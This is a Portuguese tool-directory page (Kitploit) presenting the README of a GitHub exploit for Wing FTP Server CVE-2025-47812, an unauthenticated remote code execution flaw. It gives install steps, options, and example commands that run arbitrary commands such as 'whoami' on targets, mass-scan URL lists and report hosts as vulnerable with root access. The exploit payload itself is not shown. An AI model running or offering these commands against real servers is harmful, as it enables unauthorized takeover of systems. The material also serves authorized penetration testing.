Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-47812 — Exploit para Wing FTP Server CVE-2025-47812 permitindo execução remota de código não autenticada com varredura de múltiplos alvos, suporte a proxy e múltiplos formatos de saída. | Kitploit
Ferramentas/GitHubGitHub/0xjuarez/cve-2025-47812
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHub0xjuarez/cve-2025-47812

CVE-2025-47812

Exploit para Wing FTP Server CVE-2025-47812 permitindo execução remota de código não autenticada com varredura de múltiplos alvos, suporte a proxy e múltiplos formatos de saída.

Ver Repositório
1há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚀 Wing FTP Exploit - CVE-2025-47812

Exploit melhorado para Wing FTP Server CVE-2025-47812 - Execução Remota de Código (RCE) sem autenticação

🔧 Instalação

Clone este repositório e entre no diretório:

root@kitploit:~
git clone https://github.com/0xjuarez/CVE-2025-47812.git
cd CVE-2025-47812
pip install -r requirements.txt

Ou simplesmente baixe o script CVE-2025-47812.py e execute-o.

🚀 Uso

root@kitploit:~
usage: CVE-2025-47812.py [-h] [-u URL] [-f FILE] [-c COMMAND] [-U USERNAME] [-P PASSWORD] [--check] [-v] [--proxy PROXY] [--timeout TIMEOUT] [-o OUTPUT] [--output-format {txt,json,csv}] [--threads THREADS] [--no-progress]

Exploit para Wing FTP Server CVE-2025-47812 - versão melhorada

opções:
  -h, --help            mostra esta mensagem
  -u URL, --url URL     URL alvo (ex. http://192.168.1.100:5466)
  -f FILE, --file FILE  arquivo com lista de URLs (uma por linha)
  -c COMMAND, --command COMMAND
                        comando a executar (padrão: echo CVE-2025-47812)
  -U USERNAME, --username USERNAME
                        nome de usuário (padrão: anonymous)
  -P PASSWORD, --password PASSWORD
                        senha (padrão: vazia)
  --check               modo verificação: apenas verifica se é vulnerável (usa comando inócuo)
  -v, --verbose         modo verbose (mostra detalhes)
  --proxy PROXY         proxy (ex. http://127.0.0.1:8080)
  --timeout TIMEOUT     timeout em segundos (padrão: 10)
  -o OUTPUT, --output OUTPUT
                        arquivo de saída para salvar resultados
  --output-format {txt,json,csv}
                        formato de saída (padrão: txt)
  --threads THREADS     número de threads para escanear múltiplos alvos (padrão: 5)
  --no-progress         ocultar barra de progresso

🎯 Exemplos básicos

Testar um único alvo e executar um comando:

root@kitploit:~
python CVE-2025-47812.py -u http://192.168.1.100:5466 -c "whoami" -v

Modo verificação (apenas detecta vulnerabilidade):

root@kitploit:~
python CVE-2025-47812.py -u http://192.168.1.100:5466 --check

Escanear múltiplos alvos a partir de um arquivo:

root@kitploit:~
python CVE-2025-47812.py -f targets.txt --threads 10 -o resultados.json --output-format json

Usar proxy e verbose:

root@kitploit:~
python CVE-2025-47812.py -u http://192.168.1.100:5466 --proxy http://127.0.0.1:8080 -v

📁 Estrutura do arquivo de alvos

O arquivo deve conter uma URL por linha, por exemplo:

root@kitploit:~
http://192.168.1.10:5466
http://192.168.1.11:5466
https://ftp.meuservidor.com:5466

📊 Formatos de saída

TXT

root@kitploit:~
http://192.168.1.10:5466 - VULNERÁVEL - usuário: root
http://192.168.1.11:5466 - SEGURO - Não vulnerável

JSON

root@kitploit:~
[
  {
    "target": "http://192.168.1.10:5466",
    "vulnerable": true,
    "info": "usuário: root"
  }
]

CSV

root@kitploit:~
Target,Vulnerable,Info
http://192.168.1.10:5466,True,usuário: root

⚠️ Aviso

Este exploit é projetado exclusivamente para fins educacionais e testes de segurança autorizados. O uso não autorizado desta ferramenta contra sistemas sem consentimento explícito é ilegal e pode acarretar graves consequências legais. Os autores não se responsabilizam pelo uso indevido que possa ser feito.

🤝 Créditos

  • Autor original: Sheikh Mohammad Hasan (4m3rr0r) – Descoberta e exploit base.
  • Melhorias e refatoração: 0xJuarez – Adicionadas funcionalidades de escaneamento em massa, cores, suporte a proxies, múltiplos formatos de saída e melhorias de usabilidade.

Se você gostou deste trabalho, não esqueça de dar uma estrela ⭐ no GitHub!

📄 Licença

Este projeto está licenciado sob a MIT License – veja o arquivo LICENSE para mais detalhes.

Baixar ferramenta